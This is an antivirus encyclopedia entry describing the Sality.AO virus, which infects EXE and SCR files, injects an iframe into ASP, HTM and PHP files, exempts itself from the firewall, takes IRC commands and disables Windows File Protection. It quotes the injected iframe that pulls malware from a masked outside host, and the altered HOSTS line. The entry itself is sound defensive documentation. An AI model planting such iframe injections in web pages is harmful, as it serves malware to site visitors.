Cloud Antivirus > Activity monitor > Sality.AO

Details of Virus Sality.AO

All details, description and effects of Sality.AO

CLOUD ANTIVIRUS - Share/Bookmark
Common names: Sality.AO
Technical names:
Alias:
   
Type: VIRUS
Size: 8457 Bytes
   

DETECTIONS

Number of sightings:
Date first seen: February 12, 2009 at 00:00 AM
Country first seen in:
Country last seen in:
   

Brief Description

Sality.AO is a virus which infects the files with an EXE and SCR extension it finds in the affected computer.

Additionally, it infects files with an ASP, HTM and PHP extension by using a script that allows it to download more malware to the affected computer.

Sality.AOinfects executable files with an EXE and SCR extension, and files with an ASP, HTM and PHP extension, which are then distributed through any of the usual means: floppy disks, email messages with attachments, Internet download, files transferred via FTP, IRC channels, P2P file sharing networks, etc.

Effects

Sality.AO carries out the following actions:

  • It infects the following files:
    - files with an EXE and SCR extension.
    - files with an ASP, HTM and PHP extension by using the following script:
    <iframe scr=”http://xxxxxxx.pl/rc”width=1 height=2 style=”border:0”></iframe>
    It adds this script in the files it finds in the affected computer.
    This script allows the virus to download different types of malware to the affected computer.
  • It reduces the security level of the computer, as it adds itself to the list of authorized applications by the firewall, in order to avoid being blocked.
  • It connects to an IRC channel and waits for remote instructions, such as downloading files or stealing information. In order to do so, it modifies the HOSTS file adding the following string:
    127.0.01 <blocked>F.pl
  • It disables Windows File Protection (WFP) and the checking of these files when Windows is started:
    - Windows File Protection prevents critical Windows system files from being replaced. Programs must not overwrite these files because they are used by the operating system and other programs.
    - The System File Checker tool checks if the protected files have been modified. If so, it recovers the original protected files.
    As it disables both features, the Windows protected files can be modified, which could cause problems with the operating system and the installed programs.

http://www.pandasecurity.com/homeusers/security-info/about-malware/encyclopedia/overview.aspx?idvirus=More information about virus Sality.AO in the Encyclopedia